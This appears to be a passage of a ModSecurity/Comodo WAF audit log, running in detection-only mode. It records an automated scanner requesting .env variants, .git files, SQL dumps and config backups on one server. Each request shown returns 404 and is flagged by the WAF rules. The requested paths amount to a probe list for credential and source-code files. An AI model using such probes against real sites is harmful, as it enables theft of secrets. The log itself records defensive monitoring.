--83453c1f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --83453c1f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.env"] [unique_id "aFCsJpVkCcfT-Z8NQYzFOQAAAAc"] Stopwatch: 1750117414649747 3344 (- - -) Stopwatch2: 1750117414649747 3344; combined=2146, p1=359, p2=1694, p3=18, p4=24, p5=51, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83453c1f-Z-- --24e44f5b-A-- [17/Jun/2025:05:13:34.763826 +0530] aFCsJuTJOk1gXj_qIh4YMwAAAAQ 185.177.72.204 47480 127.0.0.1 7080 --24e44f5b-B-- GET /site/.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --24e44f5b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --24e44f5b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.env.bak"] [unique_id "aFCsJuTJOk1gXj_qIh4YMwAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/.env.bak"] [unique_id "aFCsJuTJOk1gXj_qIh4YMwAAAAQ"] Stopwatch: 1750117414760267 3611 (- - -) Stopwatch2: 1750117414760267 3611; combined=2214, p1=458, p2=1611, p3=24, p4=31, p5=90, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --24e44f5b-Z-- --438f3049-A-- [17/Jun/2025:05:13:34.874764 +0530] aFCsJlJfblPUQiSn5r2R4gAAAAA 185.177.72.204 47490 127.0.0.1 7080 --438f3049-B-- GET /site/.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --438f3049-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --438f3049-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.env.local"] [unique_id "aFCsJlJfblPUQiSn5r2R4gAAAAA"] Stopwatch: 1750117414871731 3076 (- - -) Stopwatch2: 1750117414871731 3076; combined=1820, p1=402, p2=1325, p3=18, p4=24, p5=51, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --438f3049-Z-- --5a2fb10d-A-- [17/Jun/2025:05:13:34.985257 +0530] aFCsJgGFf516NUzzD0B3mQAAAAg 185.177.72.204 47502 127.0.0.1 7080 --5a2fb10d-B-- GET /site/.env.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5a2fb10d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a2fb10d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.env.old"] [unique_id "aFCsJgGFf516NUzzD0B3mQAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/.env.old"] [unique_id "aFCsJgGFf516NUzzD0B3mQAAAAg"] Stopwatch: 1750117414982127 3178 (- - -) Stopwatch2: 1750117414982127 3178; combined=1814, p1=393, p2=1306, p3=18, p4=22, p5=74, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5a2fb10d-Z-- --c3e3051b-A-- [17/Jun/2025:05:13:35.100563 +0530] aFCsJ2MOUduHrxpwbslYkAAAAAM 185.177.72.204 47508 127.0.0.1 7080 --c3e3051b-B-- GET /site/.env.save HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c3e3051b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3e3051b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.env.save"] [unique_id "aFCsJ2MOUduHrxpwbslYkAAAAAM"] Stopwatch: 1750117415097323 3284 (- - -) Stopwatch2: 1750117415097323 3284; combined=1833, p1=430, p2=1310, p3=19, p4=25, p5=49, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3e3051b-Z-- --846ab446-A-- [17/Jun/2025:05:13:35.211183 +0530] aFCsJ9yZ4SMykfn97vy3wwAAAAs 185.177.72.204 47516 127.0.0.1 7080 --846ab446-B-- GET /site/.env~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --846ab446-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --846ab446-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.env~"] [unique_id "aFCsJ9yZ4SMykfn97vy3wwAAAAs"] Stopwatch: 1750117415207913 3313 (- - -) Stopwatch2: 1750117415207913 3313; combined=2040, p1=538, p2=1405, p3=21, p4=25, p5=51, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --846ab446-Z-- --06b03a08-A-- [17/Jun/2025:05:13:35.321456 +0530] aFCsJwJ4p5Cdblnjra54LgAAAAI 185.177.72.204 47526 127.0.0.1 7080 --06b03a08-B-- GET /site/.git/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --06b03a08-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --06b03a08-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.git/"] [unique_id "aFCsJwJ4p5Cdblnjra54LgAAAAI"] Stopwatch: 1750117415318595 2904 (- - -) Stopwatch2: 1750117415318595 2904; combined=1714, p1=396, p2=1209, p3=20, p4=42, p5=47, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --06b03a08-Z-- --7ce1e266-A-- [17/Jun/2025:05:13:35.431946 +0530] aFCsJ-TJOk1gXj_qIh4YNAAAAAQ 185.177.72.204 47532 127.0.0.1 7080 --7ce1e266-B-- GET /site/.git/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7ce1e266-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ce1e266-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.git/HEAD"] [unique_id "aFCsJ-TJOk1gXj_qIh4YNAAAAAQ"] Stopwatch: 1750117415428816 3172 (- - -) Stopwatch2: 1750117415428816 3172; combined=1935, p1=426, p2=1413, p3=23, p4=23, p5=49, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7ce1e266-Z-- --26633a28-A-- [17/Jun/2025:05:13:35.542235 +0530] aFCsJwrsPejRtmHkrKLgzwAAAAE 185.177.72.204 47546 127.0.0.1 7080 --26633a28-B-- GET /site/.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --26633a28-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --26633a28-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.git/config"] [unique_id "aFCsJwrsPejRtmHkrKLgzwAAAAE"] Stopwatch: 1750117415539155 3123 (- - -) Stopwatch2: 1750117415539155 3123; combined=1877, p1=413, p2=1367, p3=23, p4=24, p5=50, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --26633a28-Z-- --1f265712-A-- [17/Jun/2025:05:13:35.719252 +0530] aFCsJ1JfblPUQiSn5r2R4wAAAAA 185.177.72.204 47554 127.0.0.1 7080 --1f265712-B-- GET /site/.git/logs/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1f265712-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f265712-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.git/logs/HEAD"] [unique_id "aFCsJ1JfblPUQiSn5r2R4wAAAAA"] Stopwatch: 1750117415716111 3185 (- - -) Stopwatch2: 1750117415716111 3185; combined=1881, p1=500, p2=1290, p3=19, p4=22, p5=49, sr=191, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1f265712-Z-- --db82fe50-A-- [17/Jun/2025:05:13:35.829618 +0530] aFCsJwGFf516NUzzD0B3mgAAAAg 185.177.72.204 47564 127.0.0.1 7080 --db82fe50-B-- GET /site/.gitignore HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --db82fe50-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --db82fe50-H-- Message: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/.gitignore"] [unique_id "aFCsJwGFf516NUzzD0B3mgAAAAg"] Stopwatch: 1750117415826445 3228 (- - -) Stopwatch2: 1750117415826445 3228; combined=1999, p1=402, p2=1500, p3=20, p4=25, p5=52, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --db82fe50-Z-- --49950e39-A-- [17/Jun/2025:05:13:35.939766 +0530] aFCsJ9yZ4SMykfn97vy3xAAAAAs 185.177.72.204 47576 127.0.0.1 7080 --49950e39-B-- GET /site/access.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --49950e39-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --49950e39-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/access.log"] [unique_id "aFCsJ9yZ4SMykfn97vy3xAAAAAs"] Stopwatch: 1750117415936953 2854 (- - -) Stopwatch2: 1750117415936953 2854; combined=1670, p1=344, p2=1235, p3=17, p4=22, p5=52, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49950e39-Z-- --e1da8958-A-- [17/Jun/2025:05:13:36.160057 +0530] aFCsKFCTF37l_jAzt4oTNgAAAAU 185.177.72.204 47598 127.0.0.1 7080 --e1da8958-B-- GET /site/app.js.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e1da8958-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1da8958-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/app.js.bak"] [unique_id "aFCsKFCTF37l_jAzt4oTNgAAAAU"] Stopwatch: 1750117416157053 3045 (- - -) Stopwatch2: 1750117416157053 3045; combined=1712, p1=344, p2=1273, p3=20, p4=23, p5=52, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1da8958-Z-- --c54d974b-A-- [17/Jun/2025:05:13:36.270788 +0530] aFCsKArsPejRtmHkrKLg0AAAAAE 185.177.72.204 47610 127.0.0.1 7080 --c54d974b-B-- GET /site/backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c54d974b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c54d974b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/backup.sql"] [unique_id "aFCsKArsPejRtmHkrKLg0AAAAAE"] Stopwatch: 1750117416267337 3502 (- - -) Stopwatch2: 1750117416267337 3502; combined=2108, p1=366, p2=1640, p3=22, p4=26, p5=53, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c54d974b-Z-- --654a7669-A-- [17/Jun/2025:05:13:36.933284 +0530] aFCsKJVkCcfT-Z8NQYzFOwAAAAc 185.177.72.204 47662 127.0.0.1 7080 --654a7669-B-- GET /site/config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --654a7669-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --654a7669-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/config.php.bak"] [unique_id "aFCsKJVkCcfT-Z8NQYzFOwAAAAc"] Stopwatch: 1750117416930353 2974 (- - -) Stopwatch2: 1750117416930353 2974; combined=1779, p1=354, p2=1336, p3=17, p4=22, p5=50, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --654a7669-Z-- --e5b5c103-A-- [17/Jun/2025:05:13:37.152807 +0530] aFCsKVJfblPUQiSn5r2R5QAAAAA 185.177.72.204 47678 127.0.0.1 7080 --e5b5c103-B-- GET /site/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e5b5c103-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5b5c103-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/db.sql"] [unique_id "aFCsKVJfblPUQiSn5r2R5QAAAAA"] Stopwatch: 1750117417149903 2946 (- - -) Stopwatch2: 1750117417149903 2946; combined=1772, p1=348, p2=1322, p3=21, p4=24, p5=57, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e5b5c103-Z-- --82ddcd72-A-- [17/Jun/2025:05:13:37.373200 +0530] aFCsKdyZ4SMykfn97vy3xgAAAAs 185.177.72.204 47696 127.0.0.1 7080 --82ddcd72-B-- GET /site/debug.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --82ddcd72-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --82ddcd72-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO 